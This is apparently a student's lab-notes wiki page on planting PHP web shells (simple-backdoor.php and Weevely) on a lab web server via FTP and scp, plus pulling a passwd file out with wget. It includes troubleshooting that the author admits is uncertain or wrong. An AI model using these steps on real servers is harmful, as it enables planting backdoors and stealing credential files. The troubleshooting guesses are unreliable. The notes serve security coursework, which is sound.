Weevely Webshells - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
Webshells
How to do
- Upload backdoor to desired webserver
Use FTP to connect to desired web server via ip address
ftp 10.0.5.25
Note: If the server is anonymous, the username is 'anonymous' and the password is left blank
Use put / mput to upload your file to the server
put /usr/share/webshells/php/simple-backdoor.php
NOTE: I wrote this before completing the prior lab that gave us webshells to use, so I do not actually have the correct code for uploading this specific script, however the syntax is the same.
This uploads your backdoor to the webserver
Weevely
What is it?
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
How to use
- First, generate a file
weevely generate password /home/champuser/file.txt
This generates a script with 'password' as the password under the new file file.txt located in /home/champuser/
- Push this script to the web server
ftp 10.0.5.25 put /home/champuser/System42.php
- Access the backdoor by using weevely and specifying the location on the target server
- Run commands to initiate the session
Troubleshooting
My first attempt will be to use scp to transfer simple-backdoor.php to the /var/www/html directory on 10.0.5.21 under an admin account and hope that it deploys it.
scp simple-backdoor.php [email protected]:/var/www/html
UPDATE: This did not work as I do not have the sufficient privileges on the target box.
I will try the python3 server now because why not.
UPDATE: I did not end up using the python3 server, instead I ended up using my ssh access to access peregrin.took and move the desired files around where I wanted. Then I used wget to extract them from the webserver. I do not understand how to execute a web shell yet so this was my alternative. This worked.
- Using wget from hostbox, target the desired file
wget http://10.0.5.21/passwd (I moved the passwd file into /var/www/html to be able to do this)
For everything above, I was doing it on the wrong server. I am unable to use these techniques for the correct server.
Another issue I was having was being unable to upload files to the target server due to a passive mode glitch. The fix was mput instead of put, which worked for some reason.
UPDATE: This did not work in the end, it was not a long term fix. I do not know what the cause of mput working was, but it only worked once, which is all I needed.
Another issue I was having was with weevely itself. It gave me an error involving padding. I ended up fixing potentially by adding
base64.b64decode(s + b'==')
to the end of the php file generated. However I'm not too sure if this was the right fix, or if it was the new file I created on my second attempt that just ended up working without any issues.